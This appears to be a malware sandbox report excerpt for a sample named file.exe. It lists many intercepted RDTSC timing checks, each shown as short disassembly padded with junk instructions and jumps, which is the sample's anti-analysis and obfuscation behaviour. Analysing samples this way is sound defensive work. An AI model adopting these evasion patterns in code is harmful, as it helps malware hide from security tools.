                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CF0ED second address: 2CF0F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB3E1482E86h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CF3CF second address: 2CF3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3E0C7B6A0h 0x00000009 pop ecx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D849D second address: 2D84C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FB3E1482E96h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D7765 second address: 2D7780 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB3E0C7B696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB3E0C7B6A1h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D7D3A second address: 2D7D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D7E79 second address: 2D7E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3E0C7B6A3h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D802F second address: 2D804D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB3E1482E95h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB3E1482E8Dh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D804D second address: 2D8057 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB3E0C7B696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D8057 second address: 2D8065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FB3E1482E8Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D81D9 second address: 2D81DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D81DD second address: 2D81F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FB3E1482E92h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D81F9 second address: 2D81FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFA8A second address: 2DFACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jno 00007FB3E1482E8Eh 0x0000000b pushad 0x0000000c jmp 00007FB3E1482E8Eh 0x00000011 push edi 0x00000012 pop edi 0x00000013 jne 00007FB3E1482E86h 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007FB3E1482E94h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFACC second address: 2DFAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFC33 second address: 2DFC49 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jnc 00007FB3E1482E86h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFC49 second address: 2DFC51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E035B second address: 2E035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E04A2 second address: 2E04B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E07DD second address: 2E07E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E07E3 second address: 2E07F8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB3E0C7B698h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FB3E0C7B696h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E07F8 second address: 2E07FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E4BE1 second address: 2E4BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E8797 second address: 2E879D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F3BD2 second address: 2F3BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F3BD8 second address: 2F3C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jbe 00007FB3E1482E8Ch 0x0000000b pushad 0x0000000c jnl 00007FB3E1482E86h 0x00000012 jnp 00007FB3E1482E86h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b popad 0x0000001c push edx 0x0000001d push eax 0x0000001e jmp 00007FB3E1482E8Ah 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F3C08 second address: 2F3C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F3C11 second address: 2F3C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 306AD3 second address: 306ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 306ADE second address: 306AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FB3E1482E86h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 306AED second address: 306AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30693F second address: 30695F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB3E1482E92h 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30695F second address: 30697B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 jmp 00007FB3E0C7B69Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FB3E0C7B696h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3102EF second address: 3102F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB3E1482E86h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30EEDD second address: 30EEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30EEE5 second address: 30EEFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3E1482E90h 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30EEFA second address: 30EF1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FB3E0C7B696h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 310038 second address: 31003E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3270C2 second address: 3270E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007FB3E0C7B696h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB3E0C7B6A1h 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3270E7 second address: 3270F4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB3E1482E88h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 323031 second address: 323040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB3E0C7B696h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 337310 second address: 337315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 337315 second address: 33731B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33731B second address: 33731F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3374C3 second address: 3374E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB3E0C7B6A2h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 350577 second address: 350580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 350580 second address: 350584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35080C second address: 350812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 350DA6 second address: 350DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 350DAC second address: 350DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jp 00007FB3E1482E86h 0x0000000f jl 00007FB3E1482E86h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 350DC3 second address: 350DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 350F07 second address: 350F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 350F0B second address: 350F0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 350F0F second address: 350F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FB3E1482E8Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 350F1F second address: 350F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351319 second address: 351349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3E1482E94h 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FB3E1482E86h 0x00000011 jmp 00007FB3E1482E90h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351349 second address: 35134F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35134F second address: 351355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 352ECD second address: 352F18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FB3E0C7B6A8h 0x0000000a popad 0x0000000b jmp 00007FB3E0C7B6A6h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 jmp 00007FB3E0C7B69Fh 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pop edi 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 352D30 second address: 352D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007FB3E1482E86h 0x0000000c popad 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop esi 0x00000013 pushad 0x00000014 jo 00007FB3E1482E86h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 352D4C second address: 352D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3557C0 second address: 3557E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3557E0 second address: 3557E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3557E6 second address: 3557EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3558A8 second address: 3558AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355AAE second address: 355AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB3E1482E96h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355AD0 second address: 355AD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355AD9 second address: 355B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 nop 0x00000007 movzx edx, ax 0x0000000a push 00000004h 0x0000000c mov edx, dword ptr [ebp+122D2B2Eh] 0x00000012 mov dword ptr [ebp+12464F1Ah], ecx 0x00000018 push 444A52E7h 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FB3E1482E8Bh 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355B04 second address: 355B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355CE7 second address: 355CED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355CED second address: 355CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355CF3 second address: 355CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355CF7 second address: 355D43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B69Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jns 00007FB3E0C7B6A5h 0x00000012 nop 0x00000013 jl 00007FB3E0C7B696h 0x00000019 push dword ptr [ebp+122D57FBh] 0x0000001f mov dh, bh 0x00000021 push 8A152822h 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FB3E0C7B69Dh 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 356F5F second address: 356F7D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB3E1482E86h 0x00000008 jmp 00007FB3E1482E90h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 356F7D second address: 356F8A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB3E0C7B696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30052 second address: 4A30056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30056 second address: 4A30071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30071 second address: 4A30077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30077 second address: 4A3007B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3007B second address: 4A300B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FB3E1482E92h 0x00000015 or eax, 4CBE6C08h 0x0000001b jmp 00007FB3E1482E8Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A300B6 second address: 4A300BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A300BC second address: 4A300C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A300C0 second address: 4A300C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A300C4 second address: 4A3011E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FB3E1482E99h 0x00000010 and ah, FFFFFFD6h 0x00000013 jmp 00007FB3E1482E91h 0x00000018 popfd 0x00000019 mov bx, cx 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FB3E1482E99h 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3011E second address: 4A30124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30124 second address: 4A30128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30128 second address: 4A3012C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10EFB second address: 4A10F0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 2D65282Ah 0x00000008 mov ch, bl 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10F0F second address: 4A10F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10F13 second address: 4A10F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10F19 second address: 4A10F61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB3E0C7B69Ch 0x00000009 sbb ecx, 36468E18h 0x0000000f jmp 00007FB3E0C7B69Bh 0x00000014 popfd 0x00000015 mov edx, eax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c movsx ebx, si 0x0000001f mov bx, cx 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FB3E0C7B6A5h 0x0000002b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10F61 second address: 4A10F66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10F66 second address: 4A10F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FB3E0C7B69Dh 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB3E0C7B69Ah 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10F89 second address: 4A10F9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3E1482E8Eh 0x00000009 rdtsc
